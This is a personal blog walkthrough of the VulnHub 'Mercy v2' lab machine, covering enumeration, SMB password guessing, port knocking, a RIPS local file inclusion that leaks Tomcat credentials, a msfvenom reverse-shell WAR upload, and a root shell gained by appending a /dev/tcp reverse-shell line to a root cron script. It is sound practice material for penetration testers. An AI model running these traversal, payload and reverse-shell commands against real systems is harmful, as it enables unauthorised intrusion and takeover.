Digitalworld Mercy Vulnhub Walkthrough

Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time.

Digitalworld.local Mercy V2 https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/

I liked this box; it reminds me of OSCP exam machines and good Hack The Box machines. It needs enumeration across multiple services, exploits several different vulnerabilities, and has three distinct stages: initial access, a user account, and root. I love the three-stage layout because I'm used to it from Hack The Box, but OSCP machines don't always have three stages.

Luckily, much of what was important for solving this box was in the Nmap output. There would have been possible rabbit holes if I had missed that. It really makes me think that I missed stuff in the exam that kept me from having a full picture of the machines. I am glad I am purposefully working on making sure my enumeration is good and that I take good notes (even on the stuff that doesn't work out).

This machine would have been more difficult without the robots.txt files.

Flow

  1. Enumerate ports
  2. Port 8080 – /tryharder/tryharder
  3. SMB qiu share works with qiu:password (clue from tryharder file)
  4. Download qiu files from SMB share
  5. Knock to open up port 22 and port 80 (knockd settings in SMB share file)
  6. Find LFI in RIPS 0.53 on port 80
  7. Read files on filesystem via LFI
    1. Read /etc/passwd to get local usernames
    2. Read tomcat configuration to get more logins (tomcat admin and local user)
  8. Log in to Tomcat admin interface, upload a reverse shell war file, get a reverse shell
  9. Pivot to fluffy user
  10. Pop a root shell by appending a reverse shell to a fluffy-writable script that a root cron job runs
  11. Get flag

Initial Enumeration

IP="10.88.42.132"
mkdir -p nmap
nmap -Pn -sC -sV -p 1-1000 -oA nmap/nmap_top1000_$IP $IP
nmap -Pn -sC -sV -p 1000-65535 -oA nmap/nmap_1000plus_$IP $IP
nmap -sC -sU -p 1-1000 -oA nmap/nmap_udp1000_$IP $IP

TCP Ports 1-1000

# Nmap 7.80 scan initiated Sun Jun 14 12:48:55 2020 as: nmap -Pn -sC -sV -p 1-1000 -oA nmap/nmap_top1000_10.88.42.132 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.0014s latency).
Not shown: 991 closed ports
PORT    STATE    SERVICE     VERSION
22/tcp  filtered ssh
53/tcp  open     domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp  filtered http
110/tcp open     pop3        Dovecot pop3d
|_pop3-capabilities: TOP UIDL RESP-CODES STLS AUTH-RESP-CODE SASL CAPA PIPELINING
|_ssl-date: TLS randomness does not represent time
139/tcp open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open     imap        Dovecot imapd (Ubuntu)
|_imap-capabilities: post-login OK have LOGINDISABLEDA0001 LOGIN-REFERRALS STARTTLS SASL-IR listed Pre-login more capabilities IDLE IMAP4rev1 ID ENABLE LITERAL+
|_ssl-date: TLS randomness does not represent time
445/tcp open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open     ssl/imaps?
|_ssl-date: TLS randomness does not represent time
995/tcp open     ssl/pop3s?
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:67:71:C0 (VMware)
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: mercy
|   NetBIOS computer name: MERCY\x00
|   Domain name: \x00
|   FQDN: mercy
|_  System time: 2020-06-15T00:49:10+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-14T16:49:10
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 12:51:36 2020 -- 1 IP address (1 host up) scanned in 160.82 seconds

Remaining 1000+ TCP Ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 12:52 EDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.88.42.132
Host is up (0.00056s latency).
Not shown: 64535 closed ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
| http-robots.txt: 1 disallowed entry 
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:67:71:C0 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.92 seconds

UDP Ports 1-1000

# Nmap 7.80 scan initiated Sun Jun 14 12:56:33 2020 as: nmap -sC -sU -p 1-1000 -oA nmap/nmap_udb1000_10.88.42.132 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00079s latency).
Not shown: 993 closed ports
PORT    STATE         SERVICE
53/udp  open          domain
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
|_dns-recursion: Recursion appears to be enabled
68/udp  open|filtered dhcpc
123/udp open          ntp
| ntp-info: 
|_  
137/udp open          netbios-ns
138/udp open|filtered netbios-dgm
323/udp open|filtered unknown
631/udp open|filtered ipp
MAC Address: 00:0C:29:67:71:C0 (VMware)

Host script results:
|_clock-skew: 8s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

# Nmap done at Sun Jun 14 13:16:06 2020 -- 1 IP address (1 host up) scanned in 1172.80 seconds

SMB Enumeration

[13:21:03]🔥root[ /home/kali/VulnHub/mercy ]# smbclient -L 10.88.42.132 
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        qiu             Disk      
        IPC$            IPC       IPC Service (MERCY server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[13:21:18]🔥root[ /home/kali/VulnHub/mercy ]# 

So, the qiu share is interesting. Keep track of qiu as a possible username.

TCP 8080 – /tryharder/tryharder Step

Nmap noticed the robots.txt and the one path it disallows.

robots.txt

http://10.88.42.132:8080/robots.txt
User-agent: *
Disallow: /tryharder/tryharder

/tryharder/tryharder

The file is one block of base64. Decoded, it reads:

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

Port 8080 – Normal

The Tomcat manager/admin interface prompts for a login, and we don't have one yet (no surprise). The instance is Tomcat 7.

SMB Share – qiu

I am a dummy here again. I get that the “password” is clearly spelled out, but I was used to being tricked for some reason, so I used the entire tryharder decoded file contents word by word to find it.

for pass in $(cat tryharder.txt); do echo ">> $pass <<" && smbclient \\\\10.88.42.132\\qiu -U qiu "$pass" 2>/dev/null ; done

The loop stops at the interactive smbclient prompt as soon as it reaches the password "password", because that one works. After that, I literally said to myself, "you're a dummy."

We can log in directly.

Now connect to the qiu share with qiu:password and download everything. Inside the smbclient prompt:

prompt
recurse
mget *

The only important files are config and configprint. configprint is a script that builds config by concatenating /etc/knockd.conf, /etc/apache2/apache2.conf and /etc/samba/smb.conf. The part we care about is the knockd configuration, because ports 22 and 80 showed as filtered in the Nmap scan: they are firewalled until the right knock sequence arrives.

configprint

#!/bin/bash

echo "Here are settings for your perusal." > config
echo "" >> config
echo "Port Knocking Daemon Configuration" >> config
echo "" >> config
cat "/etc/knockd.conf" >> config
echo "" >> config
echo "Apache2 Configuration" >> config
echo "" >> config
cat "/etc/apache2/apache2.conf" >> config
echo "" >> config
echo "Samba Configuration" >> config
echo "" >> config
cat "/etc/samba/smb.conf" >> config
echo "" >> config
echo "For other details of MERCY, please contact your system administrator." >> config

chown qiu:qiu config

config (knockd parts of interest)

...

[openHTTP]
	sequence    = 159,27391,4
	seq_timeout = 100
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
	tcpflags    = syn

...

[openSSH]
	sequence    = 17301,28504,9999
	seq_timeout = 100
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn
...

Knock Knock

# -z: no data, just the connection attempt; -w 1: give up after a second.
# knockd only needs to see the SYN, so the connect is expected to fail.
for port in 17301 28504 9999; do nc -z -w 1 10.88.42.132 $port; done   # opens 22
for port in 159 27391 4; do nc -z -w 1 10.88.42.132 $port; done        # opens 80
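The same knock as a Python script, added for this write-up (not part of the original post or the box): it parses the knockd stanzas recovered from the qiu share, replays each sequence with short-timeout connects so the whole sequence stays well inside seq_timeout, and then checks whether the target port actually opened. The target address defaults to the box IP from the scans; the stanzas are reproduced from the config file above and are the only part of it the script needs.

```python
import re
import socket
import sys
import time

# The two knockd stanzas recovered from the qiu share's config file, reproduced
# here as the parser's input (the rest of the file is not needed).
KNOCKD_CONF = """
[openHTTP]
    sequence    = 159,27391,4
    seq_timeout = 100
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
    tcpflags    = syn

[openSSH]
    sequence    = 17301,28504,9999
    seq_timeout = 100
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""


def parse_knockd(conf):
    """Return {stanza: {"sequence": [(port, proto), ...], "seq_timeout": int,
    "opens": dport or None}} for every stanza that defines a sequence."""
    stanzas, current = {}, None
    for raw in conf.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = header.group(1)
            stanzas[current] = {}
        elif current is not None and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            stanzas[current][key] = value

    rules = {}
    for name, kv in stanzas.items():
        if "sequence" not in kv:
            continue
        seq = []
        for item in kv["sequence"].split(","):
            port, _, proto = item.strip().partition(":")  # knockd allows "port:udp"
            seq.append((int(port), proto or "tcp"))
        dport = re.search(r"--dport\s+(\d+)", kv.get("command", ""))
        rules[name] = {
            "sequence": seq,
            "seq_timeout": int(kv["seq_timeout"]) if "seq_timeout" in kv else None,
            "opens": int(dport.group(1)) if dport else None,
        }
    return rules


def knock(host, sequence, pause=0.3, timeout=1.0):
    """Send the knocks in order. knockd sniffs the SYN (or UDP datagram) off the
    wire, so the connect is expected to fail: the port is closed or dropped by
    iptables. The short timeout keeps the whole sequence inside seq_timeout."""
    for port, proto in sequence:
        if proto == "udp":
            with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
                s.sendto(b"", (host, port))
        else:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                try:
                    s.connect((host, port))
                except OSError:
                    pass
        time.sleep(pause)


def port_open(host, port, timeout=2.0):
    """TCP connect check used to confirm the knock took effect."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "10.88.42.132"
    for name, rule in parse_knockd(KNOCKD_CONF).items():
        knock(target, rule["sequence"])
        state = "open" if port_open(target, rule["opens"]) else "still filtered"
        print(f"{name}: knocked {[p for p, _ in rule['sequence']]}, port {rule['opens']} {state}")
```

Run it as python3 knock.py 10.88.42.132; the openSSH and openHTTP rules are knocked one after the other, and a "still filtered" result usually means the sequence was sent too slowly or a stray packet to one of the knock ports reset it.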

Enumerate Port 22

# Nmap 7.80 scan initiated Sun Jun 14 14:04:48 2020 as: nmap -sC -sV -oA nmap/nmap_port22tcp_10.88.42.132 -p22 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00056s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 93:64:02:58:62:0e:e7:85:50:d9:97:ea:8d:01:68:f6 (DSA)
|   2048 13:77:33:9a:49:c0:51:dc:8f:fb:c8:33:17:b2:05:71 (RSA)
|   256 a2:25:3c:cf:ac:d7:0f:ae:2e:8c:c5:14:c4:65:c1:59 (ECDSA)
|_  256 33:12:1b:6a:98:da:ea:9d:8c:09:94:ed:44:8d:4e:5b (ED25519)
MAC Address: 00:0C:29:67:71:C0 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 14:04:48 2020 -- 1 IP address (1 host up) scanned in 0.74 seconds

There is nothing special there, other than knowing it is Ubuntu, so at least we can discern file paths (for later).

I tried the qiu login, and it didn’t work for SSH.

Port 80

Enumerate

# Nmap 7.80 scan initiated Sun Jun 14 14:02:07 2020 as: nmap -sC -sV -oA nmap/nmap_port80tcp_10.88.42.132 -p80 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00065s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/mercy /nomercy
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:67:71:C0 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 14:02:14 2020 -- 1 IP address (1 host up) scanned in 6.73 seconds

Nmap found the robots.txt file and showed the contents. Let’s look at it more.

robots.txt

User-agent: *
Disallow: /mercy
Disallow: /nomercy

Port 80 – /mercy

Welcome to Mercy!

We hope you do not plead for mercy too much. If you do, please help us upgrade our website to allow our visitors to obtain more than just the local time of our system.

I made a mental note of that. It rang a bell later.

Port 80 – /nomercy

It is running RIPS 0.53. The first thing to do with a web app version I have never heard of is searchsploit.

It turns up a local file inclusion in RIPS 0.53 (the file parameter of windows/code.php), and it works here.

http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/passwd

Or to grab it with the garbage removed.

wget -q -O- "http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/passwd" | awk -F'? ' '{print $2}'
...
pleadformercy:x:1000:1000:pleadformercy:/home/pleadformercy:/bin/bash
qiu:x:1001:1001:qiu:/home/qiu:/bin/bash
thisisasuperduperlonguser:x:1002:1002:,,,:/home/thisisasuperduperlonguser:/bin/bash
fluffy:x:1003:1003::/home/fluffy:/bin/sh

Getting The Tomcat Configuration Files

I wasn’t sure where Ubuntu stored Tomcat files, so I looked it up. I found https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory, and I am now looking for these files.

/etc/tomcat7/server.xml
/etc/tomcat7/tomcat-users.xml
/etc/tomcat7/web.xml
/etc/tomcat7/catalina.properties

So I grabbed them all and saved them locally, and converted the HTML entities back to ASCII.

# &amp; is decoded last so that an encoded "&amp;lt;" does not turn into "<".
for file in server.xml tomcat-users.xml web.xml catalina.properties; do
  wget -q -O- "http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/tomcat7/$file" \
    | awk -F'? ' '{print $2}' \
    | sed -e 's/&quot;/"/g' -e 's/&gt;/>/g' -e 's/&lt;/</g' -e 's/&amp;/\&/g' > "$file"
done

tomcat-users.xml contained two logins, one of them with the admin/manager roles:

thisisasuperduperlonguser:heartbreakisinevitable
fluffy:freakishfluffybunny
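The two reads above (/etc/passwd for usernames, tomcat-users.xml for credentials) share the same cleanup, so here is one added example, written for this page rather than taken from the post, that does what the awk/sed pipeline does and then parses both files. The sample inputs are constructed: the viewer's per-line prefix, the sshd entry, the tomcat-users.xml body and its role names are assumptions, since the post only lists the credentials it found.

```python
import html
import urllib.request
import xml.etree.ElementTree as ET

# The vulnerable viewer from the post; the traversal depth of six matches its URL.
LFI_URL = "http://10.88.42.132/nomercy/windows/code.php?file="

# Constructed samples of what the viewer hands back: a per-line prefix that
# ends in "? " followed by entity-encoded file content. The prefix text is
# made up; the passwd entries are the ones the post recovered, plus a nologin
# account to show the filter. The tomcat-users.xml body is also constructed
# (the post only lists the credentials, not the file) and its role names are
# an assumption.
SAMPLE_PASSWD_RAW = """\
1? root:x:0:0:root:/root:/bin/bash
2? sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
3? pleadformercy:x:1000:1000:pleadformercy:/home/pleadformercy:/bin/bash
4? qiu:x:1001:1001:qiu:/home/qiu:/bin/bash
5? thisisasuperduperlonguser:x:1002:1002:,,,:/home/thisisasuperduperlonguser:/bin/bash
6? fluffy:x:1003:1003::/home/fluffy:/bin/sh
"""

SAMPLE_TOMCAT_USERS_RAW = """\
1? &lt;tomcat-users&gt;
2?   &lt;role rolename=&quot;manager-gui&quot;/&gt;
3?   &lt;role rolename=&quot;admin-gui&quot;/&gt;
4?   &lt;user username=&quot;thisisasuperduperlonguser&quot; password=&quot;heartbreakisinevitable&quot; roles=&quot;manager-gui,admin-gui&quot;/&gt;
5?   &lt;user username=&quot;fluffy&quot; password=&quot;freakishfluffybunny&quot; roles=&quot;&quot;/&gt;
6? &lt;/tomcat-users&gt;
"""


def clean_rips_output(raw):
    """What the post's awk/sed pipeline does, done properly: keep everything
    after the first "? " on each line (awk's $2 would drop any later "? " in
    the content) and decode every HTML entity, not just &quot; &lt; &gt;."""
    out = []
    for line in raw.splitlines():
        _, sep, body = line.partition("? ")
        if sep:
            out.append(html.unescape(body))
    return "\n".join(out) + "\n"


def read_via_lfi(path, depth=6):
    """Pull an absolute path through the traversal (network; not run offline)."""
    url = LFI_URL + "../" * depth + path.lstrip("/")
    with urllib.request.urlopen(url, timeout=10) as resp:
        return clean_rips_output(resp.read().decode("utf-8", "replace"))


def login_users(passwd):
    """Account names with a real login shell: the ones worth trying elsewhere."""
    users = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not fields[6].endswith(("nologin", "/false")):
            users.append(fields[0])
    return users


def tomcat_credentials(tomcat_users_xml):
    """(username, password, [roles]) for each <user> in tomcat-users.xml."""
    creds = []
    for el in ET.fromstring(tomcat_users_xml).iter():
        if el.tag.rsplit("}", 1)[-1] == "user":  # tolerate a default namespace
            roles = [r.strip() for r in el.get("roles", "").split(",") if r.strip()]
            creds.append((el.get("username") or el.get("name"), el.get("password"), roles))
    return creds


def manager_logins(creds):
    """Only users holding a manager-* or admin-* role can reach /manager at all."""
    return [c for c in creds if any(r.startswith(("manager", "admin")) for r in c[2])]


if __name__ == "__main__":
    passwd = clean_rips_output(SAMPLE_PASSWD_RAW)  # read_via_lfi("/etc/passwd") on the box
    print("login users:", login_users(passwd))
    creds = tomcat_credentials(clean_rips_output(SAMPLE_TOMCAT_USERS_RAW))
    for user, pw, roles in manager_logins(creds):
        print(f"manager login: {user}:{pw} roles={roles}")
```

On the box, swap the sample strings for read_via_lfi("/etc/passwd") and read_via_lfi("/etc/tomcat7/tomcat-users.xml"); the role filter is the part that matters, since a Tomcat user without a manager role (fluffy here) gets nowhere on port 8080.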

Now that we have the Tomcat admin login, time to try it.

Port 8080 – Tomcat Revisited

thisisasuperduperlonguser:heartbreakisinevitable (Tomcat admin/manager)
fluffy:freakishfluffybunny (Tomcat normal, no access)

Logging in works for thisisasuperduperlonguser:heartbreakisinevitable.

Now time to get our reverse shell. The common thing to do is to use msfvenom to build a .war file, upload the war in the admin/manager interface, and then browse to the uploaded application, which pops a reverse shell.

Generate the reverse shell .war file

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.88.42.133 LPORT=4444 -f war > sogwtf.war

Start a netcat listener

nc -lvnp 4444

Upload the war file

In the Manager app's "WAR file to deploy" section, choose sogwtf.war and click Deploy.

Spawn reverse shell

Browse to the new /sogwtf application (or click it in the Manager's Applications list); the JSP runs and the listener receives the shell.

Gain Access To The Machine And Pivot To fluffy

The only other creds I have are for fluffy (freakishfluffybunny, from tomcat-users.xml), so su to that user and look around.

timeclock Script (in fluffy's ~/.private/secrets)

#!/bin/bash 

now=$(date) 
echo "The system time is: $now." > ../../../../../var/www/html/time 
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time 
chown www-data:www-data ../../../../../var/www/html/time

An interesting script. It ties in with the port 80 /mercy clue. I didn't look further and homed in on this. I checked the timestamp on the time file and whether fluffy's crontab was doing it. The file was recently updated, and fluffy didn't have a crontab, so I assumed it was root or pleadformercy (with elevated permissions to do the chown).
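What the post checks by hand (who can write the script, whether its output is still being refreshed, who could be doing the chown) as an added Python audit, not something from the post or the box. The demo recreates timeclock in a temporary directory, so it runs offline; the on-box path in the final comment is taken from fluffy's shell prompt and the /var/www/html/time output path from the script itself.

```python
import os
import re
import stat
import tempfile
import time

# fluffy's timeclock script as found on the box, used here as the sample input.
TIMECLOCK = """#!/bin/bash

now=$(date)
echo "The system time is: $now." > ../../../../../var/www/html/time
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time
chown www-data:www-data ../../../../../var/www/html/time
"""


def audit_script(path, output=None, fresh_seconds=600):
    """Why a script like timeclock is a privilege-escalation path, as a list of
    findings: who can write it, whether its output is being refreshed, and two
    hints about who runs it."""
    findings = []
    st = os.stat(path)
    if st.st_uid != 0:
        findings.append(f"owned by uid {st.st_uid}, not root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("group- or world-writable")
    if os.access(path, os.W_OK):
        findings.append("writable by the current user: anything appended runs "
                        "with the scheduler's privileges")
    with open(path) as fh:
        body = fh.read()
    if re.search(r"(^|\s)\.\./", body, re.M):
        findings.append("uses relative paths, so it depends on the caller's working directory")
    if re.search(r"^\s*chown\b", body, re.M):
        findings.append("calls chown to another user, which needs CAP_CHOWN: the scheduler is root")
    if output and os.path.exists(output):
        age = time.time() - os.stat(output).st_mtime
        if age < fresh_seconds:
            findings.append(f"{output} was rewritten {int(age)}s ago: something runs this periodically")
    return findings


def demo():
    """Recreate timeclock in a temp dir, group-writable and owned by us, and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "timeclock")
        with open(path, "w") as fh:
            fh.write(TIMECLOCK)
        os.chmod(path, 0o775)
        return audit_script(path)


if __name__ == "__main__":
    for finding in demo():
        print("-", finding)
    # On the box: audit_script("/home/fluffy/.private/secrets/timeclock", "/var/www/html/time")
```

The fix for an administrator is the mirror image of the findings: the script root-owned and mode 755, absolute paths so it does not care where cron starts it, and nothing user-writable anywhere on a root cron job's path.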

So, I worked to get another reverse shell!

I tested whether I could get a reverse shell with nc.

fluffy@mercy:~/.private/secrets$ nc -e /bin/bash 10.88.42.133 9000
nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
          [-P proxy_username] [-p source_port] [-q seconds] [-s source]
          [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
          [-x proxy_address[:port]] [destination] [port]
fluffy@mercy:~/.private/secrets$

I pulled up the trusty pentestmonkey reverse shell cheat sheet at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet to get the bash syntax (or the other nc variant with pipes). The bash one worked!

bash -i >& /dev/tcp/10.88.42.133/9000 0>&1

Getting The root Shell

echo 'bash -i >& /dev/tcp/10.88.42.133/9000 0>&1' >> timeclock

When the cron job next ran timeclock, a root shell popped on the port 9000 listener!

Get The Flags
